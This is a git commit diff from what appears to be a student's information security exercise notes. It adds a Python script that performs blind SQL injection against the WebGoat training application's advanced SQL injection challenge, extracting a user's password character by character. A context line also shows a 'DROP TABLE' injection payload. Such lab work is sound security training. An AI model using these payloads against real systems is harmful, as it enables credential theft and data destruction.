vault backup: 2023-04-17 11:35:04

2023-04-17 11:35:04 +02:00
parent 3b43426b84
commit c88eab9e54
4 changed files with 61 additions and 28 deletions
--- a/Informationssicherheit/Ueb2/Ueb2.md
+++ b/Informationssicherheit/Ueb2/Ueb2.md
@@ -96,3 +96,47 @@ Smith'; DROP TABLE access_log; --

 ### 2 

+```python
+import json  
+import requests  
+  
+def sql_injection_advance_5():  
+     alphabet_index = 0  
+     alphabet = 'abcdefghijklmnopqrstuvwxyz'  
+     password_index = 0  
+     password = ''  
+  
+     headers = {  
+        'Cookie': COOKIE,  
+     }  
+  
+     while True:  
+         payload = 'tom\' AND substring(password,{},1)=\'{}'.format(password_index + 1, alphabet[alphabet_index])  
+  
+         data = {  
+             'username_reg': payload,  
+             'email_reg': 'a@a',  
+             'password_reg': 'a',  
+             'confirm_password_reg': 'a'  
+         }  
+  
+         r = requests.put('http://HOST:PORT/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data)  
+  
+         try:  
+             response = json.loads(r.text)  
+         except:  
+             print("Wrong JSESSIONID, find it by looking at your requests once logged in.")  
+             return  
+  
+         if "already exists please try to register with a different username" not in response['feedback']:  
+             alphabet_index += 1  
+             if alphabet_index > len(alphabet) - 1:  
+                 return  
+         else:  
+             password += alphabet[alphabet_index]  
+             print(password)  
+             alphabet_index = 0  
+             password_index += 1  
+  
+sql_injection_advance_5()
+```